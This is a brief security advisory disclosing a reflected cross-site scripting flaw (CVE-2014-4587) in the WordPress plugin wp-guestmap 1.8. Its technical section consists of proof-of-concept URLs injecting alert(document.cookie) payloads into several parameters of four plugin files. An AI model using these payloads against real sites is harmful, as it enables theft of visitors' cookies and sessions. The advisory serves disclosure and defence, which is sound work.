Wp Plugin Wp Guestmap

Plugin Details

Plugin Name: wp-plugin : wp-guestmap
Effected Version : 1.8 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Minimum Level of Access Required : Unauthenticated
CVE Number : CVE-2014-4587
Identified by : Anantshri
WPScan Reference URL

Disclosure Timeline

Technical Details

http://localhost/wp-content/plugins/wp-guestmap/guest-locator.php?zl=alert(document.cookie)&mt=alert(document.cookie)&activate=activate&dc=alert(document.cookie)&

http://localhost/wp-content/plugins/wp-guestmap/online-tracker.php?zl=zl'>alert(document.cookie)&mt=mt'>alert(document.cookie)&activate=activate'>alert(document.cookie)&dc=dc'>alert(document.cookie)&

http://localhost/wp-content/plugins/wp-guestmap/stats-map.php?zl=zl'>alert(document.cookie)&mt=mt'>alert(document.cookie)&dc=dc'>alert(document.cookie)&

http://localhost/wp-content/plugins/wp-guestmap/weather-map.php?zl=zl'>alert(document.cookie)&mt=mt'>alert(document.cookie)&activate=activate'>alert(document.cookie)&dc=dc'>alert(document.cookie)&

Multiple Vulnerable Parameters found in all files.